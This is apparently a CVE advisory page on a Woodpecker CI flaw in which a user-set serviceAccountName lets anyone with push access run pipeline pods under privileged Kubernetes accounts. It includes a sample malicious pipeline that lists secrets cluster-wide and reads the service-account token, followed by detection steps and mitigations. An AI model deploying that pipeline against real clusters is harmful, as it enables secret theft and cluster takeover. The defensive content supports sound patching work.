Woodpecker CI, Privilege Escalation via Unrestricted ServiceAccountName, CVE-2026-61549 (High) -DC-Jul2026-989

Listen to this Post

CVE-2026-61549 is a privilege escalation vulnerability affecting Woodpecker CI instances that utilize the Kubernetes backend. The root cause lies in the pipeline option backend_options.kubernetes.serviceAccountName, which is passed directly to the Kubernetes pod specification without any administrative validation or gating.
When a pipeline is triggered, Woodpecker constructs a Kubernetes pod manifest to execute the CI jobs. The `serviceAccountName` field in this manifest determines which Kubernetes ServiceAccount the pod will use for authentication with the Kubernetes API server. Because this value is taken directly from user-supplied pipeline configuration options—rather than being restricted to a predefined allowlist or validated against the user’s permissions—any user with Push access to a connected repository can specify an arbitrary ServiceAccount name.
The attack surface is significant: an attacker with Push permissions can craft a `.woodpecker.yml` file that sets `backend_options.kubernetes.serviceAccountName` to a privileged ServiceAccount (e.g., one with cluster-admin bindings) that exists in the pipeline namespace. When the pipeline runs, the resulting pod operates with that ServiceAccount’s full RBAC permissions. This can lead to the exfiltration of sensitive secrets—including database credentials, API keys, and TLS certificates—and, in worst-case scenarios, full cluster takeover.
The vulnerable code paths are located in `pipeline/backend/kubernetes/backend_options.go` (where the `ServiceAccountName` field is defined) and `pipeline/backend/kubernetes/pod.go` (where it is assigned to the pod spec with no gating). The issue was introduced in commit `609ba481b5e912f59aaae8ca7bc22b44523c5e37` and affects all versions from v1.0.0 through v3.15.0. The patch is available in version v3.16.0.

DailyCVE Form

| Field | Value |

|-|-|

| Platform | Woodpecker CI |

| Version | v1.0.0 – v3.15.0 |

| Vulnerability | Privilege Escalation |

| Severity | High |

| Date | 2026-07-01 |

| Prediction | Patch: 2026-07-15 |

What Undercode Say

Analytics

Check Woodpecker version
woodpecker-server --version
Identify vulnerable versions (1.0.0 through 3.15.0)
All versions in this range are affected
Check if Kubernetes backend is in use
kubectl get pods -n <pipeline-namespace> -l app=woodpecker
Audit existing ServiceAccounts in pipeline namespace
kubectl get serviceaccounts -n <pipeline-namespace>
Check for privileged ServiceAccounts
kubectl get clusterrolebindings -o wide | grep -E "(cluster-admin|admin)"

Code Analysis

The vulnerable code flow:

// pipeline/backend/kubernetes/backend_options.go
// Field defined with no restrictions
type KubernetesBackendOptions struct {
ServiceAccountName string `json:"serviceAccountName,omitempty"`
// ... other fields
}
// pipeline/backend/kubernetes/pod.go
// Assigned directly to pod spec without validation
pod.Spec.ServiceAccountName = backendOptions.ServiceAccountName
// NO gating, NO validation, NO allowlist check

Detection Query

Search for pipelines exploiting this vulnerability
Look for .woodpecker.yml files containing:
backend_options:
kubernetes:
serviceAccountName: <suspicious-value>

Exploit

An attacker with Push permissions on a connected repository can exploit this vulnerability by creating a malicious `.woodpecker.yml` file:

.woodpecker.yml - Malicious pipeline
steps:
- name: exploit
image: bitnami/kubectl:latest
commands:
- kubectl get secrets --all-namespaces
- kubectl get clusterrolebindings
- cat /var/run/secrets/kubernetes.io/serviceaccount/token
backend_options:
kubernetes:
serviceAccountName: cluster-admin-sa Arbitrary privileged SA

When this pipeline is triggered, Woodpecker creates a pod in the pipeline namespace with serviceAccountName: cluster-admin-sa. If that ServiceAccount exists and has elevated permissions, the attacker gains those privileges, enabling:
– Secret exfiltration: Access to database credentials, API keys, TLS certificates
– Cluster takeover: Creation of new cluster-admin bindings
– Lateral movement: Access to other namespaces and workloads

Protection

Immediate Mitigations (No Upgrade)

  1. Restrict Push access: Limit repository Push permissions to trusted users only

2. Harden pipeline namespace:

Ensure no privileged ServiceAccount exists
kubectl delete clusterrolebinding <privileged-binding> -n <pipeline-ns>
Keep default ServiceAccount minimally privileged
kubectl edit serviceaccount default -n <pipeline-ns>

3. Disable ServiceAccount token automounting:

apiVersion: v1
kind: ServiceAccount
metadata:
name: default
namespace: <pipeline-ns>
automountServiceAccountToken: false

4. Enforce admission policy (OPA/Gatekeeper/Kyverno):

Kyverno policy to reject unexpected serviceAccountName
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
name: restrict-pipeline-sa
spec:
rules:
- name: validate-serviceaccount
match:
resources:
kinds:
- Pod
validate:
message: "serviceAccountName must be 'default'"
pattern:
spec:
serviceAccountName: "default"

5. Use isolated namespaces: Dedicated namespace per org/instance with no sensitive RBAC bindings

Permanent Fix

Upgrade to v3.16.0 or later, which contains the patch:

Upgrade Woodpecker server and agent
helm upgrade woodpecker woodpecker/woodpecker --version 3.16.0
Or via Docker
docker pull woodpeckerci/woodpecker-server:3.16.0

Impact

| Aspect | Details |

|–||

| Confidentiality | High – Secrets (DB credentials, API keys, TLS certs) can be exfiltrated |
| Integrity | High – Attacker can modify cluster resources and RBAC bindings |
| Availability | High – Full cluster takeover可能导致服务中断 |
| Attack Vector | Network – Requires Push access to a connected repository |
| Privileges Required | Low – Push permission on any connected repo |
| User Interaction | None – Pipeline runs automatically on push |
| Scope | Changed – Compromised pod affects entire cluster |

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top